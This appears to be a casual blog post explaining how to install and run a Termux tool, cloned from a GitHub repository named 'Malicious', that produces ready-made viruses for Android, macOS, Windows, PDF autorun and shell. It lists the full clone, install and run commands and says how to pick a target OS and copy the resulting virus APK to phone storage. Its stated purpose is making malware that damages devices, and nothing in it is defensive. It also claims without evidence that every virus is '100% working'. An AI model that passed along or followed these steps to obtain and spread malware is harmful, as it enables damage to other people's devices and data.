hey guys, today in this post i am gonna tell you how to get a virus
tool and make virus for any device without coding or anything just
follow these simple steps given below, i personally tested these viruses
in all device , i used and tried all of them in my RDP and android
emulator and i found them absolutely 100% working
It contain Some best viruses than can damage your device
With the help of this tool you able to make termux harmful Viruses for
1> Android
2> Macosx
3> Windows
4> Pdf Autorun Pc
5> shell
and many more virus!!
now be follow these steps to make your own virus !!
i> Download termux from play store
ii> Open termux and install basic commands
Installation -
$ apt-update
$ pkg install git
$ pkg install pip
$ git clone https://github.com/d3L3t3dOn3/Malicious
$ ls
$ cd Malicious
$ unzip Malicious.zip
$ cd Malicious
$ ls
$ chmod +x *
$ pip2 install -r requirements.txt
$ python2 malicious.py
( use pip2 only else it will not work at all )
now, you see this interface :-
now choose the OS for which you want to make virus!!
select any !!
you select 1 for Android , you see these sub categories i;e virus
names you can choose any the file will download then and rest is same
for all other OS categories -
If you select 2 i:e Macosx , you see this:-
If you select 3 i:e Windows , you see this:-
so, choose an !!!
and after Downloading this virus, Follow the commands to move/copy this virus apk from termux to your mobile storage !!
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